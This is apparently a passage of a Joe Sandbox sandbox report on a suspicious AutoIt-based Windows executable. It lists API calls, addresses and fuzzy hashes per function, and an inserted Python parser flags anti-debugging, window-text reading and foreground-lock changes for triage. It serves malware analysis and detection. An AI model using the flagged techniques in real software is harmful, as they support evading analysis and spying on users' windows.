                                                                                                                                • Part of subcall function 001731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001731DA
                                                                                                                                • Part of subcall function 00173A67: SHGetMalloc.SHELL32(00173C31), ref: 00173A7D
                                                                                                                                • Part of subcall function 00173A67: SHGetDesktopFolder.SHELL32(?), ref: 00173A8F
                                                                                                                                • Part of subcall function 00173A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00173AD2
                                                                                                                                • Part of subcall function 00173B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,002322E8,?), ref: 00173B65
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                              • String ID: X
                                                                                                                              • API String ID: 2727075218-3081909835
                                                                                                                              • Opcode ID: 0135736bb5e4e6fdf4aeb424efa57fa39d6f2904aeb3c0d8643328e6f16d4786
                                                                                                                              • Instruction ID: 50eb36cf4e41382787fa7f2721d7394dcdea25b5913b396120567fa298ee7c7f
                                                                                                                              • Opcode Fuzzy Hash: 0135736bb5e4e6fdf4aeb424efa57fa39d6f2904aeb3c0d8643328e6f16d4786
                                                                                                                              • Instruction Fuzzy Hash: 9B11A3B1A10298ABCF05DFD4D8056EEBBF9AF55704F00800AF915BB241CBB44A49DBA1
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID: "#
                                                                                                                              • API String ID: 4104443479-3789857742
                                                                                                                              • Opcode ID: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                              • Instruction ID: 02b2664ac8c5a950c5ce14b467fd5e3bb9e6f559147900f4622bee95604e66b9
                                                                                                                              • Opcode Fuzzy Hash: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                              • Instruction Fuzzy Hash: 86018136301225ABCB28DF2DD8919AB77A9EFC5364714842EF90ACB245D731E916C7A0
                                                                                                                              Strings
                                                                                                                              • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 001E34AA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                              • API String ID: 1029625771-2684727018
                                                                                                                              • Opcode ID: 549dabd8b5d86e081f61fd3a2b55c3740394bd74e812d48c27a6252036a37a13
                                                                                                                              • Instruction ID: 18c651ad585fa3ffcea50302c7904938d7d8f6e0783aa94be1509b09a9d78622
                                                                                                                              • Opcode Fuzzy Hash: 549dabd8b5d86e081f61fd3a2b55c3740394bd74e812d48c27a6252036a37a13
                                                                                                                              • Instruction Fuzzy Hash: 3AF06871D4420DBE8F15EFB0C8518FFB7B8AA20310F10C526E83692082EB349B09DB21
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001B6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,001B685E,?,?,?,001E4A5C,0020E448,00000003,?,?), ref: 001B66E2
                                                                                                                              • WriteFile.KERNEL32(?,?,"#,00000000,00000000,?,?,?,001E4A5C,0020E448,00000003,?,?,00174C44,?,?), ref: 001B686C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$PointerWrite
                                                                                                                              • String ID: "#
                                                                                                                              • API String ID: 539440098-3789857742
                                                                                                                              • Opcode ID: ecfecdbbad9a43d5f70a322b5c249ef2fe61898b08de4cdd8c30d46bd7344061
                                                                                                                              • Instruction ID: cb4be0fb21c7a84c547130003f87d4b078319f307029c55eeefeebe6faaab9ee
                                                                                                                              • Opcode Fuzzy Hash: ecfecdbbad9a43d5f70a322b5c249ef2fe61898b08de4cdd8c30d46bd7344061
                                                                                                                              • Instruction Fuzzy Hash: A7E04D36000208BBDB20AF94E801ADABBB9EB08320F00051AF941A2010D7B6AA14EBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c34c209c65dfa9cc708d17ee9da13298de34f6b0e9f2b445f95f566da3ba9e28
                                                                                                                              • Instruction ID: 2afcd10082f1973c07eed9d1b55c18b5ee07d97129e0166ecb89fe0237774e5e
                                                                                                                              • Opcode Fuzzy Hash: c34c209c65dfa9cc708d17ee9da13298de34f6b0e9f2b445f95f566da3ba9e28
                                                                                                                              • Instruction Fuzzy Hash: 7051D4312047019FCB14EF68C491BAE73E5AFA8324F54856DF99A8B292DB30ED45CF91
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4104443479-0
                                                                                                                              • Opcode ID: e5aa09aba4268c1cc50c761c193fdb18672b9a9d58f429ba963382a05431ee3a
                                                                                                                              • Instruction ID: 26dab7e9a5991d40774d8d9579c10c18e598249687bbaa438ebffb39bf15a142
                                                                                                                              • Opcode Fuzzy Hash: e5aa09aba4268c1cc50c761c193fdb18672b9a9d58f429ba963382a05431ee3a
                                                                                                                              • Instruction Fuzzy Hash: 513190B16002049FDB14EFA8D8819FEB7F8EF69310F64886DE18597282DB71D9058B61
APIs
• GetCursorPos.USER32(?), ref: 001C8074
• GetForegroundWindow.USER32 ref: 001C807A
  • Part of subcall function 001C6B19: GetWindowRect.USER32(?,?), ref: 001C6B2C
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Window$CursorForegroundRect
• String ID:
• API String ID: 1066937146-0
• Opcode ID: 2ffdb87695d2f9d67f73b6185900e0c22e50346b029b05596663ab30d220e7ef
• Instruction ID: 2c342f6f5a9c3e5e2329254a327c9d44e949a9b6d2641dfed8e6368b225dfc24
• Opcode Fuzzy Hash: 2ffdb87695d2f9d67f73b6185900e0c22e50346b029b05596663ab30d220e7ef
• Instruction Fuzzy Hash: 59312C75A00218AFDB11EFA4DC81BEEB7F8FF28314F14442AE945A7251DB34AE45CB90
APIs
• IsWindow.USER32(00000000), ref: 001EDB31
• IsWindow.USER32(00000000), ref: 001EDB6B
  • Part of subcall function 00171F04: GetForegroundWindow.USER32 ref: 00171FBE
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Window$Foreground
• String ID:
• API String ID: 62970417-0
• Opcode ID: 22ebb9801ac950fb7315f4923afc672320b08d0d854af1e4df14fdbac8c871ff
• Instruction ID: 1f1acbed49cd4be4c20ec396147676a7013f50c4f50ddbfbbc3a6d4a56e4c826
• Opcode Fuzzy Hash: 22ebb9801ac950fb7315f4923afc672320b08d0d854af1e4df14fdbac8c871ff
• Instruction Fuzzy Hash: FC21CD72200206AADB21AB75D881BFE77BA9F91784F118429F95ED6141EF70EE02D760
APIs
  • Part of subcall function 0017193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00171952
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001AE344
• _strlen.LIBCMT ref: 001AE34F
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSend$Timeout_strlen
• String ID:
• API String ID: 2777139624-0
• Opcode ID: 83a10175b1d81292539e42862e6cdb0e9ba3095a42187cbafa282f0e1e5f7ca3
• Instruction ID: 8b491a08a9e4c9600eac9522462ea43c946400a6134907a53945966a3f62322c
• Opcode Fuzzy Hash: 83a10175b1d81292539e42862e6cdb0e9ba3095a42187cbafa282f0e1e5f7ca3
• Instruction Fuzzy Hash: 6511A3352002046BDF05BB68DC96DBE7BF9AF6A350B10443DF60ADB192DF60994687A0
APIs
• 74A3C8D0.UXTHEME ref: 001736E6
  • Part of subcall function 00192025: __lock.LIBCMT ref: 0019202B
  • Part of subcall function 001732DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001732F6
  • Part of subcall function 001732DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0017330B
  • Part of subcall function 0017374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0017376D
  • Part of subcall function 0017374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0017377F
  • Part of subcall function 0017374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_AYRASY.exe,00000104,?,00231120,C:\Users\user\Desktop\._cache_AYRASY.exe,00231124,?,?), ref: 001737EE
  • Part of subcall function 0017374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00173860
• SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00173726
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
• String ID:
• API String ID: 3809921791-0
• Opcode ID: 360de32a75a139939e2a79d421a0e55d461e9a0cd9e907eba9c2dba0bedd3046
• Instruction ID: 6583dc702dc1ada216f666aa9426bbcde0c285a7d822975c8606b9d285083fb4
• Opcode Fuzzy Hash: 360de32a75a139939e2a79d421a0e55d461e9a0cd9e907eba9c2dba0bedd3046
• Instruction Fuzzy Hash: 18118CB19083419FC304EF29E84995ABBF8FB94710F00861EF854872A1EB709A94CF92
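The function records above are the Joe Sandbox IDA plugin's per-function output: an "APIs" list (top-level calls and "Part of subcall function" calls, each with its argument snapshot and a "ref:" address), the memory-dump provenance, and the similarity hashes. When triaging a report this long it is easier to pull those records into a table and flag the combinations that matter for this sample, such as IsDebuggerPresent, SendMessageW with message 0x0D (WM_GETTEXT, which reads another window's text) and SystemParametersInfoW with 0x2001 (SPI_SETFOREGROUNDLOCKTIMEOUT). The parser below is an added example, not Joe Sandbox code; it assumes the record layout exactly as rendered on this page, and the sample text it runs on is constructed from three records on this page with the repeated "Associated" lines trimmed. The WM_GETTEXT and SPI constants are Windows SDK values.

```python
"""Parse Joe Sandbox IDA-plugin function records and flag notable API usage.

Added example (not Joe Sandbox's own code). Assumes the record layout shown
on this page: section headers on their own line, one bullet per API call,
"Part of subcall function XXXXXXXX:" prefix for nested calls, "ref: <hex>" suffix.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three records from this report, "Associated" lines trimmed.
SAMPLE = """\
APIs
• GetCursorPos.USER32(?), ref: 001C8074
• GetForegroundWindow.USER32 ref: 001C807A
  • Part of subcall function 001C6B19: GetWindowRect.USER32(?,?), ref: 001C6B2C
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Window$CursorForegroundRect
• String ID:
• API String ID: 1066937146-0
• Instruction Fuzzy Hash: 59312C75A00218AFDB11EFA4DC81BEEB7F8FF28314F14442AE945A7251DB34AE45CB90
APIs
  • Part of subcall function 0017193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00171952
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001AE344
• _strlen.LIBCMT ref: 001AE34F
Similarity
• API ID: MessageSend$Timeout_strlen
• Instruction Fuzzy Hash: 6511A3352002046BDF05BB68DC96DBE7BF9AF6A350B10443DF60ADB192DF60994687A0
APIs
  • Part of subcall function 0017374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0017377F
• SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00173726
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
• Instruction Fuzzy Hash: 18118CB19083419FC304EF29E84995ABBF8FB94710F00861EF854872A1EB709A94CF92
"""

SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "[Part of subcall function ADDR: ]Name.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$"
)
WM_GETTEXT = "0000000D"                  # 0x000D, read another window's text
SPI_SETFOREGROUNDLOCKTIMEOUT = "00002001"  # 0x2001, disable foreground-lock protection


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None  # address of the nested function, if any


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # "API ID", "Instruction Fuzzy Hash", ...


def parse_records(text: str) -> list:
    """Split the report text into FunctionRecord objects, one per "APIs" block."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if section == "APIs":          # every record starts with its APIs block
                records.append(FunctionRecord())
            continue
        content = line.lstrip("•").strip()
        if not records:
            continue                       # text before the first record
        if section == "APIs":
            m = API_RE.match(content)
            if not m:
                raise ValueError(f"unrecognised API line: {content!r}")
            sub, name, module, args, ref = m.groups()
            arglist = [a.strip() for a in args.split(",")] if args is not None else []
            records[-1].apis.append(ApiCall(name, module, arglist, ref, sub))
        else:
            key, _, value = content.partition(":")
            records[-1].meta[key.strip()] = value.strip()
    return records


def flag_record(rec: FunctionRecord) -> list:
    """Return human-readable findings for the API combinations worth a look."""
    names = {c.name for c in rec.apis}
    findings = []
    if "IsDebuggerPresent" in names:
        findings.append("anti-debug: IsDebuggerPresent")
    for c in rec.apis:
        if c.name == "SendMessageW" and len(c.args) > 1 and c.args[1] == WM_GETTEXT:
            findings.append(f"reads window text via WM_GETTEXT at {c.ref}")
        if c.name == "SystemParametersInfoW" and c.args and c.args[0] == SPI_SETFOREGROUNDLOCKTIMEOUT:
            findings.append(f"SPI_SETFOREGROUNDLOCKTIMEOUT at {c.ref} (lets the process force itself to the foreground)")
    if {"GetForegroundWindow", "GetCursorPos"} <= names:
        findings.append("tracks foreground window and cursor position")
    return findings


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.meta.get("Instruction Fuzzy Hash", "?")[:16], rec.meta.get("API ID"))
        for f in flag_record(rec):
            print("   -", f)
```

Run it on the full report text instead of SAMPLE to get one line per function; the fuzzy hash prefix is what you would carry into a YARA or similarity search, and an unrecognised API line raises instead of being silently dropped so that layout changes in the report format are noticed.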
APIs
• CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00174C2B,?,?,?,?,0017BE63), ref: 00174BB6
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00174C2B,?,?,?,?,0017BE63), ref: 001E4972
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 548925893232901b1dad41329b79d4f268afa325ea5c307644ceac78b7d5e14a
• Instruction ID: 7532d63229b7412d23876e2c60ee878f861eb6f03dc1758fed3f12ff8f651658
• Opcode Fuzzy Hash: 548925893232901b1dad41329b79d4f268afa325ea5c307644ceac78b7d5e14a
• Instruction Fuzzy Hash: 31016D70248208BFF2344E248C8AF663AACAB09768F108319BAE86A1E0C7B45C44CB54
APIs
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,001BAEA5,?,?,00000000,00000008), ref: 0018F282
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,001BAEA5,?,?,00000000,00000008), ref: 0018F2A6
  • Part of subcall function 0018F2D0: _memmove.LIBCMT ref: 0018F307
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ByteCharMultiWide$_memmove
• String ID:
• API String ID: 3033907384-0
• Opcode ID: 4df1ae2b23ed143af2397991aeaddec5204607115e516e59b7a747198175a9cc
• Instruction ID: 3f8f64918b38c260f8a46d8b43e7099ae20108eb5c6e2e7b0cd42b768875ba5a
• Opcode Fuzzy Hash: 4df1ae2b23ed143af2397991aeaddec5204607115e516e59b7a747198175a9cc
• Instruction Fuzzy Hash: 01F03CB6104114BFAB11ABA5AC44DBB7BAEEF9A360700802AFD09CA111DA31DD41CB71
APIs
• ___lock_fhandle.LIBCMT ref: 0019F7D9
• __close_nolock.LIBCMT ref: 0019F7F2
  • Part of subcall function 0019886A: __getptd_noexit.LIBCMT ref: 0019886A
  • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: __getptd_noexit$___lock_fhandle__close_nolock
• String ID:
• API String ID: 1046115767-0
• Opcode ID: e9b7f2fbe72a3710854e6352571dd35bf952c932fec308f89d6575f25590918b
• Instruction ID: f0a0b18ecc31fca1733f0d2bd85a608417fd8c4b88714d05a151b389acd51cc7
• Opcode Fuzzy Hash: e9b7f2fbe72a3710854e6352571dd35bf952c932fec308f89d6575f25590918b
• Instruction Fuzzy Hash: 0A110832C15610AEDF557FA4E88639876505F52731F660368E4349F1E3CBB4990287B1
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0017352A
  • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
• _wcscat.LIBCMT ref: 001E66C0
